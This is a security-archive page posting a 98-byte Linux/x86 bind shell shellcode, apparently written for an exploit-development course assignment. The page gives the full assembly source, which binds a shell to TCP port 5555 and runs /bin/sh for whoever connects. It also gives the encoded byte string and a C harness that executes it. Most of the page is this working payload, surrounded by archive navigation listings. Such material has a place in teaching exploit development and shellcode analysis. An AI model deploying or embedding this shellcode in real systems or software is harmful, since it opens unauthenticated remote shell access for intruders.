Linux/x86 TCP/5555 Bindshell Shellcode

Linux/x86 TCP/5555 Bindshell Shellcode: Posted May 28, 2018; Authored by Luca Di Domenico; 98 bytes small Linux/x86 TCP/5555 bindshell shellcode.; tags | x86, tcp, shellcode; systems | linux; SHA-256 | 2695862019edfec544f315d7be17d3f2bf86d2f43cc665a7c5133f3db8244852; Download | Favorite | View

Linux/x86 TCP/5555 Bindshell Shellcode

#include<stdio.h>
#include<string.h>
 
/*
 
; Bind TCP Shellcode
; Copyright 2018, Luca Di Domenico
;
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
; Title:     Linux/x86 - TCP bind shell
; Author:    Luca Di Domenico
; Website:   https://thehackeradventure.com
; Blog post: https://thehackeradventure.com/2018/05/17/assignement1/
; Twitter:    @sudo45
; SLAE-ID:    1245
 
global _start
 
section .text
_start:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
 
; socket()
 
    push eax            
    mov al, 0x66
    mov bl, 0x1
    mov cl, 0x2
    push ebx            
    push ecx            
    lea ecx, [esp]
    int 0x80            
     
; bind()
 
    pop ecx
    pop ebx
    push word 0xb315    
    push word cx            
    mov ecx, esp
    mov dl, 0x10    
    push edx
    push ecx    
    push eax    
    xchg eax, edx
    mov al, 0x66
    mov bl, 0x2
    mov ecx, esp
    int 0x80            
 
; listen()
 
    push eax
    push edx
    mov al, 0x66
    mov bl, 0x4
    mov ecx, esp
    mov edx, eax
    int 0x80            
     
; accept()
 
    xchg eax, edx
    pop edi
    push edx
    push edi
    inc ebx
    mov ecx, esp
    int 0x80            
    xchg ebx, eax 
    xor ecx, ecx
    mov cl, 0x2
     
_dup2_loop:
 
    mov al, 0x3f
    int 0x80
    dec ecx
    jns _dup2_loop
 
; execve()
 
    xor ecx, ecx
    push ecx     ; 0x00 
    push 0x68732f2f ; hs//
    push 0x6e69622f ; nib/
    mov ebx, esp
    mov al, 0xb
    int 0x80            
 
*/
 
unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\xb0\x66\xb3\x01\xb1\x02\x53\x51\x8d\x0c\x24\xcd\x80\x59\x5b\x66\x68\x15\xb3\x66\x51\x89\xe1\xb2\x10\x52\x51\x50\x92\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x50\x52\xb0\x66\xb3\x04\x89\xe1\x89\xc2\xcd\x80\x92\x5f\x52\x57\x43\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";
 
main()
{
 
    printf("Shellcode Length:  %d\n", strlen(code));
 
    int (*ret)() = (int(*)())code;
 
    ret();
 
}

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Linux/x86 TCP/5555 Bindshell Shellcode

Linux/x86 TCP/5555 Bindshell Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linux/x86 TCP/5555 Bindshell Shellcode

Share This

Linux/x86 TCP/5555 Bindshell Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems